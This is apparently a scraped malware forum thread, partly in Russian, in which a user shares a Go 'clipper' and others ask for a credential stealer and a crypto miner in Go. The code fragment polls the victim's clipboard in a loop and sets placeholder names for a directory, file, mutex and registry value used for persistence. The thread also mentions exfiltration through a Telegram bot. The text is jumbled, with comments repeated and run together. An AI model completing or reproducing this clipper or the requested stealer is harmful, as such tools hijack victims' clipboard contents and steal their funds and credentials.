Just clipper as of now maybe soon write more malwaresЭто только клиппер?
У вас есть стиллер и майнер на GO?
thx for clipper bro! very good! im waiting stealer on go from uJust clipper as of now maybe soon write more malwares
go func() {
for {
clipboardText, _ := clipboard.ReadAll()
if clipboardText != lastClipboardText {
clipboardChan <- clipboardText
lastClipboardText = clipboardText
}
time.Sleep(time.Millisecond * 500)
}
}()
dirName = "YourDir"
fileName = "YourFile"
mutexName = "YourMutex"
registryName = "YourRegistryValue"
Yes I trying to fix when it sended message to telegram bot but decided to just remove altogether but didn't notice that thanksthe unused **time.After** case in the **select** statement
not being used ?? mistake?
Disregard the previous comment thethe unused **time.After** case in the **select** statement
not being used ?? mistake?
case <-time.After(time.Millisecond * 500):